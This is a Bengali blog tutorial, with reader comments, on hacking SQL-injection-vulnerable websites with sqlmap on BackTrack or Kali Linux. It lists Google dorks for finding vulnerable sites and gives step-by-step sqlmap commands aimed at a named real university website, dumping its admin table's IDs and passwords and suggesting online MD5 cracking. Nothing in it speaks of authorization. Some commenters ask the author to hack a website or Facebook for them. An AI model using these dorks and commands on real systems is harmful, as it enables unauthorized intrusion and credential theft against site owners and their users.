Home » Hacking tutorials » [ওয়েব হ্যাক] কিভাবে ব্যাকট্রাক বা কালি লিনাক্স এর সাহায্য Sql ভারনাবল সাইট হ্যাক করবেন Sql map দিয়ে→Posted_By_Sajeeb←

[ওয়েব হ্যাক] কিভাবে ব্যাকট্রাক বা কালি লিনাক্স এর সাহায্য Sql ভারনাবল সাইট হ্যাক করবেন Sql map দিয়ে→Posted_By_Sajeeb←

Open In AndroidApp

আসসালামওলাইকুম। আশা করি মহান আল্লাহ তা’আলার অশেষ রহমতে আপনারা সবাই ভাল আছেন।

আজকে আপনারা জানেবন যে কিভাবে ব্যাক-ট্রাক এর একটি পেনটেস্ট টুল sqlmap দিয়ে sql vulnerable ওয়েবসাইট হ্যাক করা যায়।

 

তাহলে চলেন শুরু করা যাক।
আমাদের এই টিউটোরিয়াল এর জন্য যা যা লাগবে…………
১. ব্যাক-ট্রাক। বা কালি লিনাক্স
২. একটি sql vulnerable ওয়েবসাইট।
৩. আর একটু ধৈর্য।

প্রথমে আপনারা আপনাদের ব্যাক-ট্রাক রান করেন। ব্যাক-ট্রাক চালু হওয়ার পর আপনার টার্মিনাল ওপেন করুন। এবং sqlmap রান করুন। sqlmap রান করার কমান্ড হচ্ছে………………
cd /pentest/database/sqlmap/

এবার টাইপ করুন ./sqlmap.py

./ লিনাক্স এর রান কমান্ড। এখন আপনি sqlmap চালু করতে সক্ষম।

এখন পরের স্টেপ। আমাদের একটি sql vulnerable ওয়েবসাইট লাগবে। আমি কিছু Google Dork দিচ্ছি যে গুল দিয়ে

আপনেরা vulnerable ওয়েবসাইট খুজতে পারবেন।

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=

আমরা একটা ওয়েবসাইট বেছে নিয়েছি। আমাদের টার্গেট ওয়েবসাইট হচ্ছেঃ

http://www.hu.edu.pk/viewfaculty.php?id=12

আমরা এখন অ্যাটাক শুরু করব। আমরা মাত্র ৪ টা ছোট ছোট কমান্ড এ একটা sql vulnerable ওয়েবসাইট হ্যাক করতে পারি। যেটা sqlmap এর সব চেয়ে বর সুবিধা 🙂 ।
আমাদের প্রথম কমান্ড হচ্ছেঃ ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 –current-db

আমরা যে এই কমান্ড টা দিলাম এর কাজ কি?

আপনারা আগেই জানেন যে ./sqlmap.py

হচ্ছে রান কমান্ড।

-u মানে হচ্ছে যে আমরা টার্গেট ওয়েবসাইট এর লিঙ্ক দিব এই -u এর পরে। –current-db মানে হচ্ছে ওয়েবসাইট এর বর্তমান ডাটাবেস বের করার কমান্ড। কারণ আমরা সব এডমিন আইডি এবং পাসওয়ার্ড ডাটাবেস এর মধ্যে সংরক্ষিত থাকে। যেখান থেকে আমরা ওয়েবসাইট এর এডমিন আইডি অ্যান্ড পাসওয়ার্ড বের করব।

ওকে। এখন পরের স্টেপ।

আমরা c3results নামের একটা ডাটাবেস পেয়েছি। এখন আমাদের অ্যাটাক এর পরের স্টেপ। টাইপ করুনঃ

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results –tables

 

এখানে আমরা কি কমান্ড দিলাম। আমরা শুধু –current-db এর বদলে -D লেখেছি। কারণ আমরা এখন ডাটাবেস পেয়ে গেছি। তাই আমরা -D দিয়ে ডাটাবেস এর নাম দিচ্ছি। –tables মানে হচ্ছে আমরা ওয়েবসাইট এর টেবিল গুল দেখব। আর আমাদের টার্গেট হবে এডমিন এর টেবিল

যেখানে ওয়েবসাইট এর এডমিন আইডি অ্যান্ড পাসওয়ার্ড থাকবে। এই কমান্ড দিয়ে এন্টার করার পরে আপনি অনেকগুল টেবিল দেখতে পারবেন।

 

আপনারা দেখলেন যে আমরা admin নাম এর একটা টেবিল পেয়েছি। আপনারা সব সময় যখন এ ওয়েবসাইট হ্যাক করতে বসবেন। আপনারা এই টার্গেট নিয়ে বসবেন যে আপনি ওয়েবসাইট এর এডমিন টেবিল খুঁজবেন।  এখন আমাদের পরের অ্যাটাক স্টেপ। টাইপ করুন এই কমান্ড টিঃ

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin –columns

 

আমরা সব কিছুই ঠিক রাখব। শুধু –tables এর স্থানে -T দিয়ে আমারদের টার্গেট টেবিল নেম admin দিয়েছি এবং এই টেবিল এর কলাম বের করার জন্য আমরা –columns কমান্ড টি দিয়েছি। এখন আপনারা কমান্ড টি এন্টার করলেই এডমিন টেবিল এর কলাম গুল চলে আসবে। কলাম টেবিল গুল নিচের মত দেখাবেঃ

 

 

 

এখন আমাদের লাস্ট এবং সব চেয়ে সোজা কমান্ড 😀 । এখন টাইপ করুনঃ

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin –dump

আমরা শুধু এখানে –columns এর বদলে –dump বসিয়েছি। এখন কমান্ড টি এন্টার করুন। তাহলে আপনারা নিচের মত এডমিন আইডি এবং পাসওয়ার্ড পেয়ে যাবেন।

 

 

Congratulations!!! আমরা এডমিন আইডি অ্যান্ড পাসওয়ার্ড পেয়ে গেছি। অনেক ওয়েবসাইট এর ক্ষেত্রে আপনারা পাসওয়ার্ড MD5 hash কোড পাবেন। যদি কোন সময় এই রকম সিচুএশন এ পরেন। তাহলে আপনারা গুগুল লে Hash Cracker দিয়ে Sherch করেন তারপর ওয়েবসাইট এ গিয়ে MD5 hash টি ক্র্যাক করে নিতে পারেন

 

টিউন টি প্রথম প্রকাশিত

ITKNOWLADGEBD

ফেইসবুক আমি

1 month ago (Sep 18, 2017)
Report

About Author (38)

Sajeeb Ahmed Sajeeb Ahmed
author

★★প্রযুক্তির পাগলা আমি।। আবার প্রযুক্তির পুকা ও বলতে পারেন★★

9 responses to “[ওয়েব হ্যাক] কিভাবে ব্যাকট্রাক বা কালি লিনাক্স এর সাহায্য Sql ভারনাবল সাইট হ্যাক করবেন Sql map দিয়ে→Posted_By_Sajeeb←”

  1. Mamunor Rashid Mamunor Rashid (Contributor) says:

    facebook hack korar tips dewa jaina 😒

  2. Bokul (Contributor) says:

    ভাইয়া একটা ওয়েবসা-ইট হ্যা-ক করে দি-বেন?? প্লিজ

  3. Firoj Devil Dibbo (Contributor) says:

    onek age thekei jani tar por o tnx

  4. King Sam King Sam (Author) says:

    ভাই আমার মোবাইল 4.2.2 jelly bean
    version এবং Kingroot দিয়ে Root করা। তো আমি আমার মোবাইল King root থেকে Super such তে কিভাবে পরিণত করবো ।

  5. mejbah (Contributor) says:

    hmm good copy kina jani na just pc deoya thik hoy nai
    android user ar jonno aro easy way droid havij
    try it
    good post run it on

  6. rajudhunatbogra (Contributor) says:

    ভাই মোবাইল দিয়ে কি হ্যাকিং শেখার কোন উপায় আছে? থাকলে একটু বলেন।যাতে কিছু শিখে কারো উপকারে আসতে পারি।

Leave a Reply

Switch To Desktop Version